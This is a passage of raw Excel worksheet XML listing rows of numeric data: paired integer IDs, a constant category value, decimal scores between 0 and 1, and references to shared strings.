      <c r="G6612" t="s">
        <v>13077</v>
      </c>
      <c r="H6612" t="s">
        <v>13078</v>
      </c>
    </row>
    <row r="6613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6613" s="1">
        <v>6611</v>
      </c>
      <c r="B6613">
        <v>24</v>
      </c>
      <c r="C6613">
        <v>24</v>
      </c>
      <c r="D6613">
        <v>3</v>
      </c>
      <c r="E6613">
        <v>0.68480002880096436</v>
      </c>
      <c r="F6613" t="s">
        <v>10120</v>
      </c>
      <c r="G6613" t="s">
        <v>13079</v>
      </c>
      <c r="H6613" t="s">
        <v>13080</v>
      </c>
    </row>
    <row r="6614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6614" s="1">
        <v>6612</v>
      </c>
      <c r="B6614">
        <v>564</v>
      </c>
      <c r="C6614">
        <v>564</v>
      </c>
      <c r="D6614">
        <v>3</v>
      </c>
      <c r="E6614">
        <v>0.56349998712539673</v>
      </c>
      <c r="F6614" t="s">
        <v>10120</v>
      </c>
      <c r="G6614" t="s">
        <v>13081</v>
      </c>
      <c r="H6614" t="s">
        <v>13082</v>
      </c>
    </row>
    <row r="6615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6615" s="1">
        <v>6613</v>
      </c>
      <c r="B6615">
        <v>566</v>
      </c>
      <c r="C6615">
        <v>566</v>
      </c>
      <c r="D6615">
        <v>3</v>
      </c>
      <c r="E6615">
        <v>0.99269998073577881</v>
      </c>
      <c r="F6615" t="s">
        <v>10120</v>
      </c>
      <c r="G6615" t="s">
        <v>13083</v>
      </c>
      <c r="H6615" t="s">
        <v>13084</v>
      </c>
    </row>
    <row r="6616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6616" s="1">
        <v>6614</v>
      </c>
      <c r="B6616">
        <v>4242</v>
      </c>
      <c r="C6616">
        <v>4242</v>
      </c>
      <c r="D6616">
        <v>3</v>
      </c>
      <c r="E6616">
        <v>0.96549999713897705</v>
      </c>
      <c r="F6616" t="s">
        <v>10120</v>
      </c>
      <c r="G6616" t="s">
        <v>13085</v>
      </c>
      <c r="H6616" t="s">
        <v>13086</v>
      </c>
    </row>
    <row r="6617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6617" s="1">
        <v>6615</v>
      </c>
      <c r="B6617">
        <v>4241</v>
      </c>
      <c r="C6617">
        <v>4241</v>
      </c>
      <c r="D6617">
        <v>3</v>
      </c>
      <c r="E6617">
        <v>0.99489998817443848</v>
      </c>
      <c r="F6617" t="s">
        <v>10120</v>
      </c>
      <c r="G6617" t="s">
        <v>13087</v>
      </c>
      <c r="H6617" t="s">
        <v>13088</v>
      </c>
    </row>
    <row r="6618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6618" s="1">
        <v>6616</v>
      </c>
      <c r="B6618">
        <v>4078</v>
      </c>
      <c r="C6618">
        <v>4078</v>
      </c>
      <c r="D6618">
        <v>3</v>
      </c>
      <c r="E6618">
        <v>0.68250000476837158</v>
      </c>
      <c r="F6618" t="s">
        <v>10120</v>
      </c>
      <c r="G6618" t="s">
        <v>13089</v>
      </c>
      <c r="H6618" t="s">
        <v>13090</v>
      </c>
    </row>
    <row r="6619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6619" s="1">
        <v>6617</v>
      </c>
      <c r="B6619">
        <v>4240</v>
      </c>
      <c r="C6619">
        <v>4240</v>
      </c>
      <c r="D6619">
        <v>3</v>
      </c>
      <c r="E6619">
        <v>0.99879997968673706</v>
      </c>
      <c r="F6619" t="s">
        <v>10120</v>
      </c>
      <c r="G6619" t="s">
        <v>13091</v>
      </c>
      <c r="H6619" t="s">
        <v>13092</v>
      </c>
    </row>
    <row r="6620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6620" s="1">
        <v>6618</v>
      </c>
      <c r="B6620">
        <v>4168</v>
      </c>
      <c r="C6620">
        <v>4168</v>
      </c>
      <c r="D6620">
        <v>3</v>
      </c>
      <c r="E6620">
        <v>0.98489999771118164</v>
      </c>
      <c r="F6620" t="s">
        <v>10120</v>
      </c>
      <c r="G6620" t="s">
        <v>13093</v>
      </c>
      <c r="H6620" t="s">
        <v>13094</v>
      </c>
    </row>
    <row r="6621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6621" s="1">
        <v>6619</v>
      </c>
      <c r="B6621">
        <v>4089</v>
      </c>
      <c r="C6621">
        <v>4089</v>
      </c>
      <c r="D6621">
        <v>3</v>
      </c>
      <c r="E6621">
        <v>0.77139997482299805</v>
      </c>
      <c r="F6621" t="s">
        <v>10120</v>
      </c>
      <c r="G6621" t="s">
        <v>13095</v>
      </c>
      <c r="H6621" t="s">
        <v>13096</v>
      </c>
    </row>
    <row r="6622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6622" s="1">
        <v>6620</v>
      </c>
      <c r="B6622">
        <v>4091</v>
      </c>
      <c r="C6622">
        <v>4091</v>
      </c>
      <c r="D6622">
        <v>3</v>
      </c>
      <c r="E6622">
        <v>0.77920001745223999</v>
      </c>
      <c r="F6622" t="s">
        <v>10120</v>
      </c>
      <c r="G6622" t="s">
        <v>13097</v>
      </c>
      <c r="H6622" t="s">
        <v>13098</v>
      </c>
    </row>
    <row r="6623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6623" s="1">
        <v>6621</v>
      </c>
      <c r="B6623">
        <v>634</v>
      </c>
      <c r="C6623">
        <v>634</v>
      </c>
      <c r="D6623">
        <v>3</v>
      </c>
      <c r="E6623">
        <v>0.99800002574920654</v>
      </c>
      <c r="F6623" t="s">
        <v>10120</v>
      </c>
      <c r="G6623" t="s">
        <v>13099</v>
      </c>
      <c r="H6623" t="s">
        <v>13100</v>
      </c>
    </row>
    <row r="6624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6624" s="1">
        <v>6622</v>
      </c>
      <c r="B6624">
        <v>11</v>
      </c>
      <c r="C6624">
        <v>11</v>
      </c>
      <c r="D6624">
        <v>3</v>
      </c>
      <c r="E6624">
        <v>0.414000004529953</v>
      </c>
      <c r="F6624" t="s">
        <v>10120</v>
      </c>
      <c r="G6624" t="s">
        <v>13101</v>
      </c>
      <c r="H6624" t="s">
        <v>13102</v>
      </c>
    </row>
    <row r="6625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6625" s="1">
        <v>6623</v>
      </c>
      <c r="B6625">
        <v>4161</v>
      </c>
      <c r="C6625">
        <v>4161</v>
      </c>
      <c r="D6625">
        <v>3</v>
      </c>
      <c r="E6625">
        <v>0.76249998807907104</v>
      </c>
      <c r="F6625" t="s">
        <v>10120</v>
      </c>
      <c r="G6625" t="s">
        <v>13103</v>
      </c>
      <c r="H6625" t="s">
        <v>13104</v>
      </c>
    </row>
    <row r="6626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6626" s="1">
        <v>6624</v>
      </c>
      <c r="B6626">
        <v>4160</v>
      </c>
      <c r="C6626">
        <v>4160</v>
      </c>
      <c r="D6626">
        <v>3</v>
      </c>
      <c r="E6626">
        <v>0.65450000762939453</v>
      </c>
      <c r="F6626" t="s">
        <v>10120</v>
      </c>
      <c r="G6626" t="s">
        <v>13105</v>
      </c>
      <c r="H6626" t="s">
        <v>13106</v>
      </c>
    </row>
    <row r="6627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6627" s="1">
        <v>6625</v>
      </c>
      <c r="B6627">
        <v>4094</v>
      </c>
      <c r="C6627">
        <v>4094</v>
      </c>
      <c r="D6627">
        <v>3</v>
      </c>
      <c r="E6627">
        <v>0.99849998950958252</v>
      </c>
      <c r="F6627" t="s">
        <v>10120</v>
      </c>
      <c r="G6627" t="s">
        <v>13107</v>
      </c>
      <c r="H6627" t="s">
        <v>13108</v>
      </c>
    </row>
    <row r="6628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6628" s="1">
        <v>6626</v>
      </c>
      <c r="B6628">
        <v>5532</v>
      </c>
      <c r="C6628">
        <v>5532</v>
      </c>
      <c r="D6628">
        <v>3</v>
      </c>
      <c r="E6628">
        <v>0.50190001726150513</v>
      </c>
      <c r="F6628" t="s">
        <v>10120</v>
      </c>
      <c r="G6628" t="s">
        <v>13109</v>
      </c>
      <c r="H6628" t="s">
        <v>13110</v>
      </c>
    </row>
    <row r="6629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6629" s="1">
        <v>6627</v>
      </c>
      <c r="B6629">
        <v>4159</v>
      </c>
      <c r="C6629">
        <v>4159</v>
      </c>
      <c r="D6629">
        <v>3</v>
      </c>
      <c r="E6629">
        <v>0.73729997873306274</v>
      </c>
      <c r="F6629" t="s">
        <v>10120</v>
      </c>
      <c r="G6629" t="s">
        <v>13111</v>
      </c>
      <c r="H6629" t="s">
        <v>13112</v>
      </c>
    </row>
    <row r="6630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6630" s="1">
        <v>6628</v>
      </c>
      <c r="B6630">
        <v>4100</v>
      </c>
      <c r="C6630">
        <v>4100</v>
      </c>
      <c r="D6630">
        <v>3</v>
      </c>
      <c r="E6630">
        <v>0.99409997463226318</v>
      </c>
      <c r="F6630" t="s">
        <v>10120</v>
      </c>
      <c r="G6630" t="s">
        <v>13113</v>
      </c>
      <c r="H6630" t="s">
        <v>13114</v>
      </c>
    </row>
    <row r="6631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6631" s="1">
        <v>6629</v>
      </c>
      <c r="B6631">
        <v>621</v>
      </c>
      <c r="C6631">
        <v>621</v>
      </c>
      <c r="D6631">
        <v>3</v>
      </c>
      <c r="E6631">
        <v>0.39669999480247498</v>
      </c>
      <c r="F6631" t="s">
        <v>10120</v>
      </c>
      <c r="G6631" t="s">
        <v>13115</v>
      </c>
      <c r="H6631" t="s">
        <v>13116</v>
      </c>
    </row>
    <row r="6632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6632" s="1">
        <v>6630</v>
      </c>
      <c r="B6632">
        <v>5533</v>
      </c>
      <c r="C6632">
        <v>5533</v>
      </c>
      <c r="D6632">
        <v>3</v>
      </c>
      <c r="E6632">
        <v>0.65820002555847168</v>
      </c>
      <c r="F6632" t="s">
        <v>10120</v>
      </c>
      <c r="G6632" t="s">
        <v>13117</v>
      </c>
      <c r="H6632" t="s">
        <v>13118</v>
      </c>
    </row>
    <row r="6633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6633" s="1">
        <v>6631</v>
      </c>
      <c r="B6633">
        <v>4156</v>
      </c>
      <c r="C6633">
        <v>4156</v>
      </c>
      <c r="D6633">
        <v>3</v>
      </c>
      <c r="E6633">
        <v>0.72979998588562012</v>
      </c>
      <c r="F6633" t="s">
        <v>10120</v>
      </c>
      <c r="G6633" t="s">
        <v>13119</v>
      </c>
      <c r="H6633" t="s">
        <v>13120</v>
      </c>
    </row>
    <row r="6634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6634" s="1">
        <v>6632</v>
      </c>
      <c r="B6634">
        <v>4101</v>
      </c>
      <c r="C6634">
        <v>4101</v>
      </c>
      <c r="D6634">
        <v>3</v>
      </c>
      <c r="E6634">
        <v>0.98530000448226929</v>
      </c>
      <c r="F6634" t="s">
        <v>10120</v>
      </c>
      <c r="G6634" t="s">
        <v>13121</v>
      </c>
      <c r="H6634" t="s">
        <v>13122</v>
      </c>
    </row>
    <row r="6635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6635" s="1">
        <v>6633</v>
      </c>
      <c r="B6635">
        <v>4103</v>
      </c>
      <c r="C6635">
        <v>4103</v>
      </c>
      <c r="D6635">
        <v>3</v>
      </c>
      <c r="E6635">
        <v>0.73079997301101685</v>
      </c>
      <c r="F6635" t="s">
        <v>10120</v>
      </c>
      <c r="G6635" t="s">
        <v>13123</v>
      </c>
      <c r="H6635" t="s">
        <v>13124</v>
      </c>
    </row>
    <row r="6636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6636" s="1">
        <v>6634</v>
      </c>
      <c r="B6636">
        <v>4146</v>
      </c>
      <c r="C6636">
        <v>4146</v>
      </c>
      <c r="D6636">
        <v>3</v>
      </c>
      <c r="E6636">
        <v>0.57069998979568481</v>
      </c>
      <c r="F6636" t="s">
        <v>10120</v>
      </c>
      <c r="G6636" t="s">
        <v>13125</v>
      </c>
      <c r="H6636" t="s">
        <v>13126</v>
      </c>
    </row>
    <row r="6637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6637" s="1">
        <v>6635</v>
      </c>
      <c r="B6637">
        <v>9</v>
      </c>
      <c r="C6637">
        <v>9</v>
      </c>
      <c r="D6637">
        <v>3</v>
      </c>
      <c r="E6637">
        <v>0.9968000054359436</v>
      </c>
      <c r="F6637" t="s">
        <v>10120</v>
      </c>
      <c r="G6637" t="s">
        <v>13127</v>
      </c>
      <c r="H6637" t="s">
        <v>13128</v>
      </c>
    </row>
    <row r="6638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6638" s="1">
        <v>6636</v>
      </c>
      <c r="B6638">
        <v>4143</v>
      </c>
      <c r="C6638">
        <v>4143</v>
      </c>
      <c r="D6638">
        <v>3</v>
      </c>
      <c r="E6638">
        <v>0.64209997653961182</v>
      </c>
      <c r="F6638" t="s">
        <v>10120</v>
      </c>
      <c r="G6638" t="s">
        <v>13129</v>
      </c>
      <c r="H6638" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="6639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6639" s="1">
        <v>6637</v>
      </c>
      <c r="B6639">
        <v>4142</v>
      </c>
      <c r="C6639">
        <v>4142</v>
      </c>
      <c r="D6639">
        <v>3</v>
      </c>
      <c r="E6639">
        <v>0.71139997243881226</v>
      </c>
      <c r="F6639" t="s">
        <v>10120</v>
      </c>
      <c r="G6639" t="s">
        <v>13131</v>
      </c>
      <c r="H6639" t="s">
        <v>13132</v>
      </c>
    </row>
    <row r="6640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6640" s="1">
        <v>6638</v>
      </c>
      <c r="B6640">
        <v>8</v>
      </c>
      <c r="C6640">
        <v>8</v>
      </c>
      <c r="D6640">
        <v>3</v>
      </c>
      <c r="E6640">
        <v>0.99750000238418579</v>
      </c>
      <c r="F6640" t="s">
        <v>10120</v>
      </c>
      <c r="G6640" t="s">
        <v>13133</v>
      </c>
      <c r="H6640" t="s">
        <v>13134</v>
      </c>
    </row>
    <row r="6641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6641" s="1">
        <v>6639</v>
      </c>
      <c r="B6641">
        <v>4141</v>
      </c>
      <c r="C6641">
        <v>4141</v>
      </c>
      <c r="D6641">
        <v>3</v>
      </c>
      <c r="E6641">
        <v>0.84950000047683716</v>
      </c>
      <c r="F6641" t="s">
        <v>10120</v>
      </c>
      <c r="G6641" t="s">
        <v>13135</v>
      </c>
      <c r="H6641" t="s">
        <v>13136</v>
      </c>
    </row>
    <row r="6642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6642" s="1">
        <v>6640</v>
      </c>
      <c r="B6642">
        <v>629</v>
      </c>
      <c r="C6642">
        <v>629</v>
      </c>
      <c r="D6642">
        <v>3</v>
      </c>
      <c r="E6642">
        <v>0.78109997510910034</v>
      </c>
      <c r="F6642" t="s">
        <v>10120</v>
      </c>
      <c r="G6642" t="s">
        <v>13137</v>
      </c>
      <c r="H6642" t="s">
        <v>13138</v>
      </c>
    </row>
    <row r="6643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6643" s="1">
        <v>6641</v>
      </c>
      <c r="B6643">
        <v>4139</v>
      </c>
      <c r="C6643">
        <v>4139</v>
      </c>
      <c r="D6643">
        <v>3</v>
      </c>
      <c r="E6643">
        <v>0.48420000076293951</v>
      </c>
      <c r="F6643" t="s">
        <v>10120</v>
      </c>
      <c r="G6643" t="s">
        <v>13139</v>
      </c>
      <c r="H6643" t="s">
        <v>13140</v>
      </c>
    </row>
    <row r="6644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6644" s="1">
        <v>6642</v>
      </c>
      <c r="B6644">
        <v>4134</v>
      </c>
      <c r="C6644">
        <v>4134</v>
      </c>
      <c r="D6644">
        <v>3</v>
      </c>
      <c r="E6644">
        <v>0.50400000810623169</v>
      </c>
      <c r="F6644" t="s">
        <v>10120</v>
      </c>
      <c r="G6644" t="s">
        <v>13141</v>
      </c>
      <c r="H6644" t="s">
        <v>13142</v>
      </c>
    </row>
    <row r="6645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6645" s="1">
        <v>6643</v>
      </c>
      <c r="B6645">
        <v>4133</v>
      </c>
      <c r="C6645">
        <v>4133</v>
      </c>
      <c r="D6645">
        <v>3</v>
      </c>
      <c r="E6645">
        <v>0.59210002422332764</v>
      </c>
      <c r="F6645" t="s">
        <v>10120</v>
      </c>
      <c r="G6645" t="s">
        <v>13143</v>
      </c>
      <c r="H6645" t="s">
        <v>13144</v>
      </c>
    </row>
    <row r="6646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6646" s="1">
        <v>6644</v>
      </c>
      <c r="B6646">
        <v>4121</v>
      </c>
      <c r="C6646">
        <v>4121</v>
      </c>
      <c r="D6646">
        <v>3</v>
      </c>
      <c r="E6646">
        <v>0.87459999322891235</v>
      </c>
      <c r="F6646" t="s">
        <v>10120</v>
      </c>
      <c r="G6646" t="s">
        <v>13145</v>
      </c>
      <c r="H6646" t="s">
        <v>13146</v>
      </c>
    </row>
    <row r="6647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6647" s="1">
        <v>6645</v>
      </c>
      <c r="B6647">
        <v>4119</v>
      </c>
      <c r="C6647">
        <v>4119</v>
      </c>
      <c r="D6647">
        <v>3</v>
      </c>
      <c r="E6647">
        <v>0.61100000143051147</v>
      </c>
      <c r="F6647" t="s">
        <v>10120</v>
      </c>
      <c r="G6647" t="s">
        <v>13147</v>
      </c>
      <c r="H6647" t="s">
        <v>13148</v>
      </c>
    </row>
    <row r="6648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6648" s="1">
        <v>6646</v>
      </c>
      <c r="B6648">
        <v>4111</v>
      </c>
      <c r="C6648">
        <v>4111</v>
      </c>
      <c r="D6648">
        <v>3</v>
      </c>
      <c r="E6648">
        <v>0.55949997901916504</v>
      </c>
      <c r="F6648" t="s">
        <v>10120</v>
      </c>
      <c r="G6648" t="s">
        <v>13149</v>
      </c>
      <c r="H6648" t="s">
        <v>13150</v>
      </c>
    </row>
    <row r="6649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6649" s="1">
        <v>6647</v>
      </c>
      <c r="B6649">
        <v>5524</v>
      </c>
      <c r="C6649">
        <v>5524</v>
      </c>
      <c r="D6649">
        <v>3</v>
      </c>
      <c r="E6649">
        <v>0.74720001220703125</v>
      </c>
      <c r="F6649" t="s">
        <v>10120</v>
      </c>
      <c r="G6649" t="s">
        <v>13151</v>
      </c>
      <c r="H6649" t="s">
        <v>13152</v>
      </c>
    </row>
    <row r="6650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6650" s="1">
        <v>6648</v>
      </c>
      <c r="B6650">
        <v>29</v>
      </c>
      <c r="C6650">
        <v>29</v>
      </c>
      <c r="D6650">
        <v>3</v>
      </c>
      <c r="E6650">
        <v>0.99919998645782471</v>
      </c>
      <c r="F6650" t="s">
        <v>10120</v>
      </c>
      <c r="G6650" t="s">
        <v>13153</v>
      </c>
      <c r="H6650" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="6651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6651" s="1">
        <v>6649</v>
      </c>
      <c r="B6651">
        <v>4175</v>
      </c>
      <c r="C6651">
        <v>4175</v>
      </c>
      <c r="D6651">
        <v>3</v>
      </c>
      <c r="E6651">
        <v>0.44299998879432678</v>
      </c>
      <c r="F6651" t="s">
        <v>10120</v>
      </c>
      <c r="G6651" t="s">
        <v>13155</v>
      </c>
      <c r="H6651" t="s">
        <v>13156</v>
      </c>
    </row>
    <row r="6652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6652" s="1">
        <v>6650</v>
      </c>
      <c r="B6652">
        <v>5523</v>
      </c>
      <c r="C6652">
        <v>5523</v>
      </c>
      <c r="D6652">
        <v>3</v>
      </c>
      <c r="E6652">
        <v>0.64620000123977661</v>
      </c>
      <c r="F6652" t="s">
        <v>10120</v>
      </c>
      <c r="G6652" t="s">
        <v>13157</v>
      </c>
      <c r="H6652" t="s">
        <v>13158</v>
      </c>
    </row>
    <row r="6653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6653" s="1">
        <v>6651</v>
      </c>
      <c r="B6653">
        <v>4238</v>
      </c>
      <c r="C6653">
        <v>4238</v>
      </c>
      <c r="D6653">
        <v>3</v>
      </c>
      <c r="E6653">
        <v>0.99449998140335083</v>
      </c>
      <c r="F6653" t="s">
        <v>10120</v>
      </c>
      <c r="G6653" t="s">
        <v>13159</v>
      </c>
      <c r="H6653" t="s">
        <v>13160</v>
      </c>
    </row>
    <row r="6654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6654" s="1">
        <v>6652</v>
      </c>
      <c r="B6654">
        <v>590</v>
      </c>
      <c r="C6654">
        <v>590</v>
      </c>
      <c r="D6654">
        <v>3</v>
      </c>
      <c r="E6654">
        <v>0.98909997940063477</v>
      </c>
      <c r="F6654" t="s">
        <v>10120</v>
      </c>
      <c r="G6654" t="s">
        <v>13161</v>
      </c>
      <c r="H6654" t="s">
        <v>13162</v>
      </c>
    </row>
    <row r="6655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6655" s="1">
        <v>6653</v>
      </c>
      <c r="B6655">
        <v>591</v>
      </c>
      <c r="C6655">
        <v>591</v>
      </c>
      <c r="D6655">
        <v>3</v>
      </c>
      <c r="E6655">
        <v>0.97089999914169312</v>
      </c>
      <c r="F6655" t="s">
        <v>10120</v>
      </c>
      <c r="G6655" t="s">
        <v>13163</v>
      </c>
      <c r="H6655" t="s">
        <v>13164</v>
      </c>
    </row>
    <row r="6656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6656" s="1">
        <v>6654</v>
      </c>
      <c r="B6656">
        <v>15</v>
      </c>
      <c r="C6656">
        <v>15</v>
      </c>
      <c r="D6656">
        <v>3</v>
      </c>
      <c r="E6656">
        <v>0.43529999256134028</v>
      </c>
      <c r="F6656" t="s">
        <v>10120</v>
      </c>
      <c r="G6656" t="s">
        <v>13165</v>
      </c>
      <c r="H6656" t="s">
        <v>13166</v>
      </c>
    </row>
    <row r="6657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6657" s="1">
        <v>6655</v>
      </c>
      <c r="B6657">
        <v>13</v>
      </c>
      <c r="C6657">
        <v>13</v>
      </c>
      <c r="D6657">
        <v>3</v>
      </c>
      <c r="E6657">
        <v>0.92110002040863037</v>
      </c>
      <c r="F6657" t="s">
        <v>10120</v>
      </c>
      <c r="G6657" t="s">
        <v>13167</v>
      </c>
      <c r="H6657" t="s">
        <v>13168</v>
      </c>
    </row>
    <row r="6658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6658" s="1">
        <v>6656</v>
      </c>
      <c r="B6658">
        <v>4231</v>
      </c>
      <c r="C6658">
        <v>4231</v>
      </c>
      <c r="D6658">
        <v>3</v>
      </c>
      <c r="E6658">
        <v>0.64010000228881836</v>
      </c>
      <c r="F6658" t="s">
        <v>10120</v>
      </c>
      <c r="G6658" t="s">
        <v>13169</v>
      </c>
      <c r="H6658" t="s">
        <v>13170</v>
      </c>
    </row>
    <row r="6659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6659" s="1">
        <v>6657</v>
      </c>
      <c r="B6659">
        <v>4225</v>
      </c>
      <c r="C6659">
        <v>4225</v>
      </c>
      <c r="D6659">
        <v>3</v>
      </c>
      <c r="E6659">
        <v>0.99849998950958252</v>
      </c>
      <c r="F6659" t="s">
        <v>10120</v>
      </c>
      <c r="G6659" t="s">
        <v>13171</v>
      </c>
      <c r="H6659" t="s">
        <v>13172</v>
      </c>
    </row>
    <row r="6660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6660" s="1">
        <v>6658</v>
      </c>
      <c r="B6660">
        <v>592</v>
      </c>
      <c r="C6660">
        <v>592</v>
      </c>
      <c r="D6660">
        <v>3</v>
      </c>
      <c r="E6660">
        <v>0.67640000581741333</v>
      </c>
      <c r="F6660" t="s">
        <v>10120</v>
      </c>
      <c r="G6660" t="s">
        <v>13173</v>
      </c>
      <c r="H6660" t="s">
        <v>13174</v>
      </c>
    </row>
    <row r="6661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6661" s="1">
        <v>6659</v>
      </c>
      <c r="B6661">
        <v>593</v>
      </c>
      <c r="C6661">
        <v>593</v>
      </c>
      <c r="D6661">
        <v>3</v>
      </c>
      <c r="E6661">
        <v>0.66990000009536743</v>
      </c>
      <c r="F6661" t="s">
        <v>10120</v>
      </c>
      <c r="G6661" t="s">
        <v>13175</v>
      </c>
      <c r="H6661" t="s">
        <v>13176</v>
      </c>
    </row>
    <row r="6662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6662" s="1">
        <v>6660</v>
      </c>
      <c r="B6662">
        <v>4223</v>
      </c>
      <c r="C6662">
        <v>4223</v>
      </c>
      <c r="D6662">
        <v>3</v>
      </c>
      <c r="E6662">
        <v>0.92189997434616089</v>
      </c>
      <c r="F6662" t="s">
        <v>10120</v>
      </c>
      <c r="G6662" t="s">
        <v>13177</v>
      </c>
      <c r="H6662" t="s">
        <v>13178</v>
      </c>
    </row>
    <row r="6663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6663" s="1">
        <v>6661</v>
      </c>
      <c r="B6663">
        <v>4220</v>
      </c>
      <c r="C6663">
        <v>4220</v>
      </c>
      <c r="D6663">
        <v>3</v>
      </c>
      <c r="E6663">
        <v>0.98170000314712524</v>
      </c>
      <c r="F6663" t="s">
        <v>10120</v>
      </c>
      <c r="G6663" t="s">
        <v>13179</v>
      </c>
      <c r="H6663" t="s">
        <v>13180</v>
      </c>
    </row>
    <row r="6664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6664" s="1">
        <v>6662</v>
      </c>
      <c r="B6664">
        <v>4079</v>
      </c>
      <c r="C6664">
        <v>4079</v>
      </c>
      <c r="D6664">
        <v>3</v>
      </c>
      <c r="E6664">
        <v>0.98809999227523804</v>
      </c>
      <c r="F6664" t="s">
        <v>10120</v>
      </c>
      <c r="G6664" t="s">
        <v>13181</v>
      </c>
      <c r="H6664" t="s">
        <v>13182</v>
      </c>
    </row>
    <row r="6665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6665" s="1">
        <v>6663</v>
      </c>
      <c r="B6665">
        <v>4209</v>
      </c>
      <c r="C6665">
        <v>4209</v>
      </c>
      <c r="D6665">
        <v>3</v>
      </c>
      <c r="E6665">
        <v>0.66869997978210449</v>
      </c>
      <c r="F6665" t="s">
        <v>10120</v>
      </c>
      <c r="G6665" t="s">
        <v>13183</v>
      </c>
      <c r="H6665" t="s">
        <v>13184</v>
      </c>
    </row>
    <row r="6666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6666" s="1">
        <v>6664</v>
      </c>
      <c r="B6666">
        <v>4084</v>
      </c>
      <c r="C6666">
        <v>4084</v>
      </c>
      <c r="D6666">
        <v>3</v>
      </c>
      <c r="E6666">
        <v>0.67629998922348022</v>
      </c>
      <c r="F6666" t="s">
        <v>10120</v>
      </c>
      <c r="G6666" t="s">
        <v>13185</v>
      </c>
      <c r="H6666" t="s">
        <v>13186</v>
      </c>
    </row>
    <row r="6667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6667" s="1">
        <v>6665</v>
      </c>
      <c r="B6667">
        <v>5540</v>
      </c>
      <c r="C6667">
        <v>5540</v>
      </c>
      <c r="D6667">
        <v>3</v>
      </c>
      <c r="E6667">
        <v>0.53839999437332153</v>
      </c>
      <c r="F6667" t="s">
        <v>10120</v>
      </c>
      <c r="G6667" t="s">
        <v>13187</v>
      </c>
      <c r="H6667" t="s">
        <v>13188</v>
      </c>
    </row>
    <row r="6668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6668" s="1">
        <v>6666</v>
      </c>
      <c r="B6668">
        <v>4207</v>
      </c>
      <c r="C6668">
        <v>4207</v>
      </c>
      <c r="D6668">
        <v>3</v>
      </c>
      <c r="E6668">
        <v>0.98549997806549072</v>
      </c>
      <c r="F6668" t="s">
        <v>10120</v>
      </c>
      <c r="G6668" t="s">
        <v>13189</v>
      </c>
      <c r="H6668" t="s">
        <v>13190</v>
      </c>
    </row>
    <row r="6669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6669" s="1">
        <v>6667</v>
      </c>
      <c r="B6669">
        <v>12</v>
      </c>
      <c r="C6669">
        <v>12</v>
      </c>
      <c r="D6669">
        <v>3</v>
      </c>
      <c r="E6669">
        <v>0.65549999475479126</v>
      </c>
      <c r="F6669" t="s">
        <v>10120</v>
      </c>
      <c r="G6669" t="s">
        <v>13191</v>
      </c>
      <c r="H6669" t="s">
        <v>13192</v>
      </c>
    </row>
    <row r="6670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6670" s="1">
        <v>6668</v>
      </c>
      <c r="B6670">
        <v>5519</v>
      </c>
      <c r="C6670">
        <v>5519</v>
      </c>
      <c r="D6670">
        <v>3</v>
      </c>
      <c r="E6670">
        <v>0.45489999651908869</v>
      </c>
      <c r="F6670" t="s">
        <v>10120</v>
      </c>
      <c r="G6670" t="s">
        <v>13193</v>
      </c>
      <c r="H6670" t="s">
        <v>13194</v>
      </c>
    </row>
    <row r="6671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6671" s="1">
        <v>6669</v>
      </c>
